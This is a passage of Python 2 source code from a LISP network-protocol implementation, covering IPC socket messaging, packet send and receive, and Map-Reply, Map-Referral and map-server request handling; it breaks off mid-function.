# Open socket for sending to port 4342.
#
def lisp_open_send_socket(internal_name, afi):
if (internal_name == ""):
if (afi == LISP_AFI_IPV4):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (afi == LISP_AFI_IPV6):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
else:
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(internal_name)
#endif
return(sock)
#enddef
#
# lisp_close_socket
#
# Close network and internal sockets.
#
def lisp_close_socket(sock, internal_name):
sock.close()
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
return
#endif
#
# lisp_is_running
#
# Test if one of "lisp-itr", "lisp-etr", "lisp-mr", "lisp-ms", "lisp-ddt", or
# "lisp-core" is running.
#
def lisp_is_running(node):
return(True if (os.path.exists(node)) else False)
#enddef
#
# lisp_packet_ipc
#
# Build IPC message for a LISP control packet destined for UDP port 4342. This
# packet goes to the lisp-core process and then it IPCs it to the appropriate
# LISP component process.
#
def lisp_packet_ipc(packet, source, sport):
return(("packet@" + str(len(packet)) + "@" + source + "@" + str(sport) + \
"@" + packet))
#enddef
#
# lisp_control_packet_ipc
#
# Build IPC message for a packet that needs to be source from UDP port 4342.
# Always sent by a LISP component process to the lisp-core process.
#
def lisp_control_packet_ipc(packet, source, dest, dport):
return("control-packet@" + dest + "@" + str(dport) + "@" + packet)
#enddef
#
# lisp_data_packet_ipc
#
# Build IPC message for a MAC, IPv4, or IPv6 data packet.
#
def lisp_data_packet_ipc(packet, source):
return("data-packet@" + str(len(packet)) + "@" + source + "@@" + packet)
#enddef
#
# lisp_command_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
def lisp_command_ipc(packet, source):
return("command@" + str(len(packet)) + "@" + source + "@@" + packet)
#enddef
#
# lisp_api_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
def lisp_api_ipc(source, data):
return("api@" + str(len(data)) + "@" + source + "@@" + data)
#enddef
#
# lisp_ipc
#
# Send IPC message to internal AF_UNIX socket if LISP component is running. We
# need to send in 15000 byte segments since the socket interface will not allow
# to support more. And socket.setsockopt() won't alow to increase SO_SNDBUF.
#
def lisp_ipc(packet, send_socket, node):
#
# Can't send an IPC message to a process that is not running.
#
if (lisp_is_running(node) == False):
lprint("Suppress sending IPC to {}".format(node))
return
#endif
ipc_len = 1500 if (packet.find("control-packet") == -1) else 9000
offset = 0
length = len(packet)
retry_count = 0
sleep_time = .001
while (length > 0):
segment_len = min(length, ipc_len)
segment = packet[offset:segment_len+offset]
try:
send_socket.sendto(segment, node)
lprint("Send IPC {}-out-of-{} byte to {} succeeded".format( \
len(segment), len(packet), node))
retry_count = 0
sleep_time = .001
except socket.error, e:
if (retry_count == 12):
lprint("Giving up on {}, consider it down".format(node))
break
#endif
lprint("Send IPC {}-out-of-{} byte to {} failed: {}".format( \
len(segment), len(packet), node, e))
retry_count += 1
time.sleep(sleep_time)
lprint("Retrying after {} ms ...".format(sleep_time * 1000))
sleep_time *= 2
continue
#endtry
offset += segment_len
length -= segment_len
#endwhile
return
#enddef
#
# lisp_format_packet
#
# Put a whitespace between every 4 bytes of a packet dump.
#
def lisp_format_packet(packet):
packet = binascii.hexlify(packet)
offset = 0
new = ""
length = len(packet) * 2
while (offset < length):
new += packet[offset:offset+8] + " "
offset += 8
length -= 4
#endfor
return(new)
#enddef
#
# lisp_send
#
# Send packet out.
#
def lisp_send(lisp_sockets, dest, port, packet):
lisp_socket = lisp_sockets[0] if dest.is_ipv4() else lisp_sockets[1]
#
# Remove square brackets. Use an IPv4 socket when address is IPv4, even
# when embedded in ::ffff:<ipv4-address>. This is a special case when
# an RTR sits behind a NAT and is sending a Map-Request. The ECM and
# Map-Request need to use the same ephemeral port and the Map-Reply
# needs to come to the ephemeral listening socket lisp_sockets[0];
#
# Also, on getchip and raspberry-pi OSes, there is no support for IPv6
# sockets, so we need to use the IPv4 embedded address and the IPv4
# socket.
#
address = dest.print_address_no_iid()
if (address.find("::ffff:") != -1 and address.count(".") == 3):
if (lisp_i_am_rtr): lisp_socket = lisp_sockets[0]
if (lisp_socket == None):
lisp_socket = lisp_sockets[0]
address = address.split("::ffff:")[-1]
#endif
#endif
lprint("{} {} bytes {} {}, packet: {}".format(bold("Send", False),
len(packet), bold("to " + address, False), port,
lisp_format_packet(packet)))
#
# If Map-Request/Reply RLOC-probe set TTL for outgoing packet to 255.
#
set_ttl = (LISP_RLOC_PROBE_TTL == 255)
if (set_ttl):
lisp_type = struct.unpack("B", packet[0])[0]
set_ttl = (lisp_type in [0x12, 0x28])
if (set_ttl): lisp_set_ttl(lisp_socket, LISP_RLOC_PROBE_TTL)
#endif
try: lisp_socket.sendto(packet, (address, port))
except socket.error, e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#
# Set back to default TTL.
#
if (set_ttl): lisp_set_ttl(lisp_socket, 64)
return
#enddef
#
# lisp_receive_segments
#
# Process 1500 byte segments if received IPC packet greater than what sockets
# can support.
#
def lisp_receive_segments(lisp_socket, packet, source, total_length):
#
# If the total length is equal to the segment length. We only have one
# segment which is the packet. Return it.
#
segment_len = total_length - len(packet)
if (segment_len == 0): return([True, packet])
lprint("Received {}-out-of-{} byte segment from {}".format(len(packet),
total_length, source))
#
# Otherwise, receive each segment and assemble it to return entire packet
# to caller.
#
length = segment_len
while (length > 0):
try: segment = lisp_socket.recvfrom(9000)
except: return([False, None])
segment = segment[0]
#
# The sender gave up and sent a new message that made it to us, last
# partial packet must be dropped.
#
if (segment.find("packet@") == 0):
seg = segment.split("@")
lprint("Received new message ({}-out-of-{}) while receiving " + \
"fragments, old message discarded", len(segment),
seg[1] if len(seg) > 2 else "?")
return([False, segment])
#endif
length -= len(segment)
packet += segment
lprint("Received {}-out-of-{} byte segment from {}".format( \
len(segment), total_length, source))
#endwhile
return([True, packet])
#enddef
#
# lisp_bit_stuff
#
# For every element in the array, insert a 0x40 ("@"). This is a bit-stuffing
# procedure. Only look array elemsnts with index 2 and above.
#
def lisp_bit_stuff(payload):
lprint("Bit-stuffing, found {} segments".format(len(payload)))
packet = ""
for segment in payload: packet += segment + "\x40"
return(packet[:-1])
#enddef
#
# lisp_receive
#
# Wait for packet to come in. This function call will block. For command
# IPCs, we need to loop to assemble all segments.
#
# For an internal socket, the format of a recvfrom() 'packet-data' is:
#
# "command" @ <total-length> @ <source> @ <packet-buffer>
# "packet" @ <total-length> @ <source> @ <command-buffer>
#
# So when an array of length 4 does not exist, we are receiving a fragment.
#
# For an external network socket, the format of a recvfrom() is:
#
# packet_data[0] = <packet-buffer>
# packet_data[1] = [<source>, <port>]
#
def lisp_receive(lisp_socket, internal):
while (True):
#
# Read from socket. Return if we received an error.
#
try: packet_data = lisp_socket.recvfrom(9000)
except: return(["", "", "", ""])
#
# This is a packet received on the network. If it was fragmented at the
# sender, then IP did it so it is assebled into a complete datagram
# in this sytem.
#
if (internal == False):
packet = packet_data[0]
source = lisp_convert_6to4(packet_data[1][0])
port = packet_data[1][1]
if (port == LISP_DATA_PORT):
do_log = lisp_data_plane_logging
packet_str = lisp_format_packet(packet[0:60]) + " ..."
else:
do_log = True
packet_str = lisp_format_packet(packet)
#endif
if (do_log):
lprint("{} {} bytes {} {}, packet: {}".format(bold("Receive",
False), len(packet), bold("from " + source, False), port,
packet_str))
#endif
return(["packet", source, port, packet])
#endif
#
# This is an IPC message that can be fragmented by lisp-core or the
# sending socket interface.
#
assembled = False
data = packet_data[0]
loop = False
while (assembled == False):
data = data.split("@")
if (len(data) < 4):
lprint("Possible fragment (length {}), from old message, " + \
"discarding", len(data[0]))
loop = True
break
#endif
opcode = data[0]
try:
total_length = int(data[1])
except:
error_str = bold("Internal packet reassembly error", False)
lprint("{}: {}".format(error_str, packet_data))
loop = True
break
#endtry
source = data[2]
port = data[3]
#
# If any of the data payload has a 0x40 byte (which is "@" in
# ascii), we will confuse the IPC separator from real data.
# So go to the payload and put in 0x40 where split() seperated
# the data. This particularly happens with Map-Notify messages
# since the first byte of the message is 0x40.
#
if (len(data) > 5):
packet = lisp_bit_stuff(data[4::])
else:
packet = data[4]
#endif
#
# Check for reassembly. Once reassembled, then we can process one
# large packet.
#
assembled, packet = lisp_receive_segments(lisp_socket, packet,
source, total_length)
if (packet == None): return(["", "", "", ""])
#
# We did not finish assembling a message but the sender sent a new
# one.
#
if (assembled == False):
data = packet
continue
#endif
if (port == ""): port = "no-port"
if (opcode == "command" and lisp_i_am_core == False):
index = packet.find(" {")
command = packet if index == -1 else packet[:index]
command = ": '" + command + "'"
else:
command = ""
#endif
lprint("{} {} bytes {} {}, {}{}".format(bold("Receive", False),
len(packet), bold("from " + source, False), port, opcode,
command if (opcode in ["command", "api"]) else ": ... " if \
(opcode == "data-packet") else \
": " + lisp_format_packet(packet)))
#endif
#endwhile
if (loop): continue
return([opcode, source, port, packet])
#endwhile
#enddef
#
# lisp_parse_packet
#
# Parse LISP control message.
#
def lisp_parse_packet(lisp_sockets, packet, source, udp_sport, ttl=-1):
trigger_flag = False
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return(trigger_flag)
#endif
#
# Store source in internal lisp_address() format.
#
from_ipc = source
if (source.find("lisp") == -1):
s = lisp_address(LISP_AFI_NONE, "", 0, 0)
s.string_to_afi(source)
s.store_address(source)
source = s
#endif
if (header.type == LISP_MAP_REQUEST):
lisp_process_map_request(lisp_sockets, packet, None, 0, source,
udp_sport, False, ttl)
elif (header.type == LISP_MAP_REPLY):
lisp_process_map_reply(lisp_sockets, packet, source, ttl)
elif (header.type == LISP_MAP_REGISTER):
lisp_process_map_register(lisp_sockets, packet, source, udp_sport)
elif (header.type == LISP_MAP_NOTIFY):
if (from_ipc == "lisp-etr"):
lisp_process_multicast_map_notify(packet, source)
else:
if (lisp_is_running("lisp-rtr")):
lisp_process_multicast_map_notify(packet, source)
#endif
lisp_process_map_notify(lisp_sockets, packet, source)
#endif
elif (header.type == LISP_MAP_NOTIFY_ACK):
lisp_process_map_notify_ack(packet, source)
elif (header.type == LISP_MAP_REFERRAL):
lisp_process_map_referral(lisp_sockets, packet, source)
elif (header.type == LISP_NAT_INFO and header.is_info_reply()):
x, y, trigger_flag = lisp_process_info_reply(source, packet, True)
elif (header.type == LISP_NAT_INFO and header.is_info_reply() == False):
addr_str = source.print_address_no_iid()
lisp_process_info_request(lisp_sockets, packet, addr_str, udp_sport,
None)
elif (header.type == LISP_ECM):
lisp_process_ecm(lisp_sockets, packet, source, udp_sport)
else:
lprint("Invalid LISP control packet type {}".format(header.type))
#endif
return(trigger_flag)
#enddef
#
# lisp_process_rloc_probe_request
#
# Process Map-Request with RLOC-probe bit set.
#
def lisp_process_rloc_probe_request(lisp_sockets, map_request, source, port,
ttl):
p = bold("RLOC-probe", False)
if (lisp_i_am_etr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_etr_process_map_request(lisp_sockets, map_request, source, port,
ttl)
return
#endif
if (lisp_i_am_rtr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_rtr_process_map_request(lisp_sockets, map_request, source, port,
ttl)
return
#endif
lprint("Ignoring received {} Map-Request, not an ETR or RTR".format(p))
return
#enddef
#
# lisp_process_smr
#
def lisp_process_smr(map_request):
lprint("Received SMR-based Map-Request")
return
#enddef
#
# lisp_process_smr_invoked_request
#
def lisp_process_smr_invoked_request(map_request):
lprint("Received SMR-invoked Map-Request")
return
#enddef
#
# lisp_build_map_reply
#
# Build a Map-Reply and return a packet to the caller.
#
def lisp_build_map_reply(eid, group, rloc_set, nonce, action, ttl, rloc_probe,
keys, enc, auth, mr_ttl=-1):
map_reply = lisp_map_reply()
map_reply.rloc_probe = rloc_probe
map_reply.echo_nonce_capable = enc
map_reply.hop_count = 0 if (mr_ttl == -1) else mr_ttl
map_reply.record_count = 1
map_reply.nonce = nonce
packet = map_reply.encode()
map_reply.print_map_reply()
eid_record = lisp_eid_record()
eid_record.rloc_count = len(rloc_set)
eid_record.authoritative = auth
eid_record.record_ttl = ttl
eid_record.action = action
eid_record.eid = eid
eid_record.group = group
packet += eid_record.encode()
eid_record.print_record(" ", False)
local_rlocs = lisp_get_all_addresses() + lisp_get_all_translated_rlocs()
for rloc_entry in rloc_set:
rloc_record = lisp_rloc_record()
addr_str = rloc_entry.rloc.print_address_no_iid()
if (addr_str in local_rlocs):
rloc_record.local_bit = True
rloc_record.probe_bit = rloc_probe
rloc_record.keys = keys
if (rloc_entry.priority == 254 and lisp_i_am_rtr):
rloc_record.rloc_name = "RTR"
#endif
#endif
rloc_record.store_rloc_entry(rloc_entry)
rloc_record.reach_bit = True
rloc_record.print_record(" ")
packet += rloc_record.encode()
#endfor
return(packet)
#enddef
#
# lisp_build_map_referral
#
# Build a Map-Referral and return a packet to the caller.
#
def lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce):
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
eid_record = lisp_eid_record()
rloc_count = 0
if (ddt_entry == None):
eid_record.eid = eid
eid_record.group = group
else:
rloc_count = len(ddt_entry.delegation_set)
eid_record.eid = ddt_entry.eid
eid_record.group = ddt_entry.group
ddt_entry.map_referrals_sent += 1
#endif
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
#
# Use action passed into this function. But if NULL, select the action
# based on the first ddt-node child type.
#
incomplete = False
if (action == LISP_DDT_ACTION_NULL):
if (rloc_count == 0):
action = LISP_DDT_ACTION_NODE_REFERRAL
else:
ddt_node = ddt_entry.delegation_set[0]
if (ddt_node.is_ddt_child()):
action = LISP_DDT_ACTION_NODE_REFERRAL
#endif
if (ddt_node.is_ms_child()):
action = LISP_DDT_ACTION_MS_REFERRAL
#endif
#endif
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (lisp_i_am_ms and ddt_node.is_ms_peer() == False)
#endif
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
if (rloc_count == 0): return(packet)
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
return(packet)
#enddef
#
# lisp_etr_process_map_request
#
# Do ETR processing of a Map-Request.
#
def lisp_etr_process_map_request(lisp_sockets, map_request, source, sport,
ttl):
if (map_request.target_group.is_null()):
db = lisp_db_for_lookups.lookup_cache(map_request.target_eid, False)
else:
db = lisp_db_for_lookups.lookup_cache(map_request.target_group, False)
if (db): db = db.lookup_source_cache(map_request.target_eid, False)
#endif
eid_str = map_request.print_prefix()
if (db == None):
lprint("Database-mapping entry not found for requested EID {}". \
format(green(eid_str, False)))
return
#endif
prefix_str = db.print_eid_tuple()
lprint("Found database-mapping EID-prefix {} for requested EID {}". \
format(green(prefix_str, False), green(eid_str, False)))
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address() and lisp_nat_traversal):
itr_rloc = source
#endif
nonce = map_request.nonce
enc = lisp_nonce_echoing
keys = map_request.keys
db.map_replies_sent += 1
packet = lisp_build_map_reply(db.eid, db.group, db.rloc_set, nonce,
LISP_NO_ACTION, 1440, map_request.rloc_probe, keys, enc, True, ttl)
#
# If we are sending a RLOC-probe Map-Reply to an RTR, data encapsulate it.
# If we are getting RLOC-probe Map-Requests from an xTR behind a NAT, and
# we are an ETR not behind a NAT, we want return the RLOC-probe Map-Reply
# to the swapped control ports.
#
# We could be getting a RLOC-probe from an xTR that is behind the same
# NAT as us. So do not data encapsulate the RLOC-probe reply.
#
# There is a special hack here. If the sport is 0, this RLOC-probe
# request is coming from an RTR. If we are doing gleaning on the RTR,
# this xTR needs to data encapsulate the RLOC-probe reply. The lisp_rtr_
# list will not be set because a gleaned xTR does not have NAT-traversal
# enabled.
#
if (map_request.rloc_probe and len(lisp_sockets) == 4):
public = (itr_rloc.is_private_address() == False)
rtr = itr_rloc.print_address_no_iid()
if ((public and lisp_rtr_list.has_key(rtr)) or sport == 0):
lisp_encapsulate_rloc_probe(lisp_sockets, itr_rloc, None, packet)
return
#endif
#endif
#
# Send to lisp-core process to send packet from UDP port 4342.
#
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_rtr_process_map_request
#
# Do ETR processing of a Map-Request.
#
def lisp_rtr_process_map_request(lisp_sockets, map_request, source, sport,
ttl):
#
# Get ITR-RLOC to return Map-Reply to.
#
itr_rloc = map_request.itr_rlocs[0]
if (itr_rloc.is_private_address()): itr_rloc = source
nonce = map_request.nonce
eid = map_request.target_eid
group = map_request.target_group
rloc_set = []
for myrloc in [lisp_myrlocs[0], lisp_myrlocs[1]]:
if (myrloc == None): continue
rloc = lisp_rloc()
rloc.rloc.copy_address(myrloc)
rloc.priority = 254
rloc_set.append(rloc)
#endfor
enc = lisp_nonce_echoing
keys = map_request.keys
packet = lisp_build_map_reply(eid, group, rloc_set, nonce, LISP_NO_ACTION,
1440, True, keys, enc, True, ttl)
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, sport)
return
#enddef
#
# lisp_get_private_rloc_set
#
# If the source-EID and target-EID of a Map-Request are behind the same NAT,
# that is, have the same global RLOC address, then return just the private
# addresses in the Map-Reply so the xTRs have shortest RLOC paths between
# each other and don't have to hair-pin through the NAT/firewall device.
#
def lisp_get_private_rloc_set(target_site_eid, seid, group):
rloc_set = target_site_eid.registered_rlocs
source_site_eid = lisp_site_eid_lookup(seid, group, False)
if (source_site_eid == None): return(rloc_set)
#
# Get global RLOC address from target site.
#
target_rloc = None
new_set = []
for rloc_entry in rloc_set:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()):
new_rloc = copy.deepcopy(rloc_entry)
new_set.append(new_rloc)
continue
#endif
target_rloc = rloc_entry
break
#endfor
if (target_rloc == None): return(rloc_set)
target_rloc = target_rloc.rloc.print_address_no_iid()
#
# Get global RLOC address from source site.
#
source_rloc = None
for rloc_entry in source_site_eid.registered_rlocs:
if (rloc_entry.is_rtr()): continue
if (rloc_entry.rloc.is_private_address()): continue
source_rloc = rloc_entry
break
#endfor
if (source_rloc == None): return(rloc_set)
source_rloc = source_rloc.rloc.print_address_no_iid()
#
# If the xTRs are behind the same NAT, then we return private addresses.
#
site_id = target_site_eid.site_id
if (site_id == 0):
if (source_rloc == target_rloc):
lprint("Return private RLOCs for sites behind {}".format( \
target_rloc))
return(new_set)
#endif
return(rloc_set)
#endif
#
# If the xTRs are not behind the same NAT, but are configured in the
# same site-id, they can reach each other with private addresses. So
# return them in the RLOC-set.
#
if (site_id == source_site_eid.site_id):
lprint("Return private RLOCs for sites in site-id {}".format(site_id))
return(new_set)
#endif
return(rloc_set)
#enddef
#
# lisp_get_partial_rloc_set
#
# If the Map-Request source is found in the RLOC-set, return all RLOCs that
# do not have the same priority as the Map-Request source (an RTR supporting
# NAT-traversal) RLOC. Otherwise, return all RLOCs that are not priority 254.
#
def lisp_get_partial_rloc_set(registered_rloc_set, mr_source, multicast):
rtr_list = []
rloc_set = []
#
# Search the RTR list to see if the Map-Requestor is an RTR. If so,
# return the RLOC-set to the RTR so it can replicate directly to ETRs.
# Otherwise, return the RTR-list locator-set to the requesting ITR/PITR.
#
rtr_is_requestor = False
behind_nat = False
for rloc_entry in registered_rloc_set:
if (rloc_entry.priority != 254): continue
behind_nat |= True
if (rloc_entry.rloc.is_exact_match(mr_source) == False): continue
rtr_is_requestor = True
break
#endfor
#
# If we find an RTR in the RLOC-set, then the site's RLOC-set is behind
# a NAT. Otherwise, do not return a partial RLOC-set. This RLOC-set is in
# public space.
#
if (behind_nat == False): return(registered_rloc_set)
#
# An RTR can be behind a NAT when deployed in a cloud infrastructure.
# When the MS is in the same cloud infrastructure, the source address
# of the Map-Request (ECM) is not translated. So we are forced to put
# the private address in the rtr-list the MS advertises. But we should
# not return the private address in any Map-Replies. We use the private
# address in the rtr-list for the sole purpose to identify the RTR so
# we can return the RLOC-set of the ETRs.
#
ignore_private = (os.getenv("LISP_RTR_BEHIND_NAT") != None)
#
# Create two small lists. A list of RTRs which are unicast priority of
# 254 and a rloc-set which are records that are not priority 254.
#
for rloc_entry in registered_rloc_set:
if (ignore_private and rloc_entry.rloc.is_private_address()): continue
if (multicast == False and rloc_entry.priority == 255): continue
if (multicast and rloc_entry.mpriority == 255): continue
if (rloc_entry.priority == 254):
rtr_list.append(rloc_entry)
else:
rloc_set.append(rloc_entry)
#endif
#endif
#
# The RTR is sending the Map-Request.
#
if (rtr_is_requestor): return(rloc_set)
#
# An ITR is sending the Map-Request.
#
# Chcek the case where an ETR included a local RLOC and may be behind
# the same NAT as the requester. In this case, the requester can encap
# directly the private RLOC. If it is not reachable, the ITR can encap
# to the RTR. The ITR will cache a subset of the RLOC-set in this entry
# (so it can check the global RLOC first and not encap to itself).
#
rloc_set = []
for rloc_entry in registered_rloc_set:
if (rloc_entry.rloc.is_private_address()): rloc_set.append(rloc_entry)
#endfor
rloc_set += rtr_list
return(rloc_set)
#enddef
#
# lisp_store_pubsub_state
#
# Take information from Map-Request to create a pubsub cache. We remember
# the map-server lookup EID-prefix. So when the RLOC-set changes for this
# EID-prefix, we trigger a Map-Notify messate to the ITR's RLOC and port
# number.
#
def lisp_store_pubsub_state(reply_eid, itr_rloc, mr_sport, nonce, ttl, xtr_id):
pubsub = lisp_pubsub(itr_rloc, mr_sport, nonce, ttl, xtr_id)
pubsub.add(reply_eid)
return
#enddef
#
# lisp_convert_reply_to_notify
#
# In lisp_ms_process_map_request(), a proxy map-reply is built to return to
# a requesting ITR. If the requesting ITR set the N-bit in the Map-Request,
# a subscription request is being requested, return a Map-Notify so it knows
# it has been acked.
#
# This function takes a fully built Map-Reply, changes the first 4 bytes to
# make the message a Map-Notify and inserts 4-bytes of Key-ID, Alg-ID, and
# Authentication Length of 0. Then we have converted the Map-Reply into a
# Map-Notify.
#
def lisp_convert_reply_to_notify(packet):
#
# Get data we need from Map-Reply for Map-Notify.
#
record_count = struct.unpack("I", packet[0:4])[0]
record_count = socket.ntohl(record_count) & 0xff
nonce = packet[4:12]
packet = packet[12::]
#
# Build Map-Notify header.
#
first_long = (LISP_MAP_NOTIFY << 28) | record_count
header = struct.pack("I", socket.htonl(first_long))
auth = struct.pack("I", 0)
#
# Concat fields of Map-Notify.
#
packet = header + nonce + auth + packet
return(packet)
#enddef
#
# lisp_notify_subscribers
#
# There has been an RLOC-set change, inform all subscribers who have subscribed
# to this EID-prefix.
#
def lisp_notify_subscribers(lisp_sockets, eid_record, eid, site):
eid_str = eid.print_prefix()
if (lisp_pubsub_cache.has_key(eid_str) == False): return
for pubsub in lisp_pubsub_cache[eid_str].values():
itr = pubsub.itr
port = pubsub.port
itr_str = red(itr.print_address_no_iid(), False)
sub_str = bold("subscriber", False)
xtr_id = "0x" + lisp_hex_string(pubsub.xtr_id)
nonce = "0x" + lisp_hex_string(pubsub.nonce)
lprint(" Notify {} {}:{} xtr-id {} for {}, nonce {}".format( \
sub_str, itr_str, port, xtr_id, green(eid_str, False), nonce))
lisp_build_map_notify(lisp_sockets, eid_record, [eid_str], 1, itr,
port, pubsub.nonce, 0, 0, 0, site, False)
pubsub.map_notify_count += 1
#endfor
return
#enddef
#
# lisp_process_pubsub
#
# Take a fully built Map-Reply and send a Map-Notify as a pubsub ack.
#
def lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc, port, nonce,
ttl, xtr_id):
#
# Store subscriber state.
#
lisp_store_pubsub_state(reply_eid, itr_rloc, port, nonce, ttl, xtr_id)
eid = green(reply_eid.print_prefix(), False)
itr = red(itr_rloc.print_address_no_iid(), False)
mn = bold("Map-Notify", False)
xtr_id = "0x" + lisp_hex_string(xtr_id)
lprint("{} pubsub request for {} to ack ITR {} xtr-id: {}".format(mn,
eid, itr, xtr_id))
#
# Convert Map-Reply to Map-Notify header and send out.
#
packet = lisp_convert_reply_to_notify(packet)
lisp_send_map_notify(lisp_sockets, packet, itr_rloc, port)
return
#enddef
#
# lisp_ms_process_map_request
#
# Do Map-Server processing of a Map-Request. Returns various LISP-DDT internal
# and external action values.
#
def lisp_ms_process_map_request(lisp_sockets, packet, map_request, mr_source,
mr_sport, ecm_source):
#
# Look up EID in site cache. If we find it and it has registered for
# proxy-replying, this map-server will send the Map-Reply. Otherwise,
# send to one of the ETRs at the registered site.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
itr_rloc = map_request.itr_rlocs[0]
xtr_id = map_request.xtr_id
nonce = map_request.nonce
action = LISP_NO_ACTION
pubsub = map_request.subscribe_bit
#
# Check if we are verifying Map-Request signatures. If so, do a mapping
# database lookup on the source-EID to get public-key.
#
sig_good = True
is_crypto_hash = (lisp_get_eid_hash(eid) != None)
if (is_crypto_hash):
sig = map_request.map_request_signature
if (sig == None):
sig_good = False
lprint(("EID-crypto-hash signature verification {}, " + \
"no signature found").format(bold("failed", False)))
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("EID-crypto-hash signature verification {}".format(pf))
#endif
#endif
if (pubsub and sig_good == False):
pubsub = False
lprint("Suppress creating pubsub state due to signature failure")
#endif
#
# There are two cases here that need attention. If the Map-Request was
# an IPv6 Map-Request but the ECM came to us in a IPv4 packet, we need
# to return the Map-Reply in IPv4. And if the Map-Request came to us
# through a NAT, sending the Map-Reply to the Map-Request port won't
# get translated by the NAT. So we have to return the Map-Reply to the
# ECM port. Hopefully, the RTR is listening on the ECM port and using
# the Map-Request port as the ECM port as well. This is typically only
# a problem on the RTR, when behind a NAT. For an ITR, it usaully
# doesn't send Map-Requests since NAT-traversal logic installs default
# map-cache entries.
#
reply_dest = itr_rloc if (itr_rloc.afi == ecm_source.afi) else ecm_source
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None or site_eid.is_star_g()):
notfound = bold("Site not found", False)
lprint("{} for requested EID {}".format(notfound,
green(eid_str, False)))
#
# Send negative Map-Reply with TTL 15 minutes.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, 15, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_SITE_NOT_FOUND])
#endif
prefix_str = site_eid.print_eid_tuple()
site_name = site_eid.site.site_name
#
# If we are requesting for non Crypto-EIDs and signatures are configured
# to be requred and no signature is in the Map-Request, bail.
#
if (is_crypto_hash == False and site_eid.require_signature):
sig = map_request.map_request_signature
sig_eid = map_request.signature_eid
if (sig == None or sig_eid.is_null()):
lprint("Signature required for site {}".format(site_name))
sig_good = False
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("Required signature verification {}".format(pf))
#endif
#endif
#
# Check if site-eid is registered.
#
if (sig_good and site_eid.registered == False):
lprint("Site '{}' with EID-prefix {} is not registered for EID {}". \
format(site_name, green(prefix_str, False), green(eid_str, False)))
#
# We do not to return a coarser EID-prefix to the Map-Resolver. The
# AMS site entry may be one.
#
if (site_eid.accept_more_specifics == False):
eid = site_eid.eid
group = site_eid.group
#endif
#
# Send forced-TTLs even for native-forward entries.
#
ttl = 1
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Send negative Map-Reply with TTL 1 minute.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, ttl, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_MS_NOT_REG])
#endif
#
# Should we proxy-reply?
#
nat = False
pr_str = ""
check_policy = False
if (site_eid.force_nat_proxy_reply):
pr_str = ", nat-forced"
nat = True
check_policy = True
elif (site_eid.force_proxy_reply):
pr_str = ", forced"
check_policy = True
elif (site_eid.proxy_reply_requested):
pr_str = ", requested"
check_policy = True
elif (map_request.pitr_bit and site_eid.pitr_proxy_reply_drop):
pr_str = ", drop-to-pitr"
action = LISP_DROP_ACTION
elif (site_eid.proxy_reply_action != ""):
action = site_eid.proxy_reply_action
pr_str = ", forced, action {}".format(action)
action = LISP_DROP_ACTION if (action == "drop") else \
LISP_NATIVE_FORWARD_ACTION
#endif
#
# Apply policy to determine if we send a negative map-reply with action
# "policy-denied" or we send a map-reply with the policy set parameters.
#
policy_drop = False
policy = None
if (check_policy and lisp_policies.has_key(site_eid.policy)):
p = lisp_policies[site_eid.policy]
if (p.match_policy_map_request(map_request, mr_source)): policy = p
if (policy):
ps = bold("matched", False)
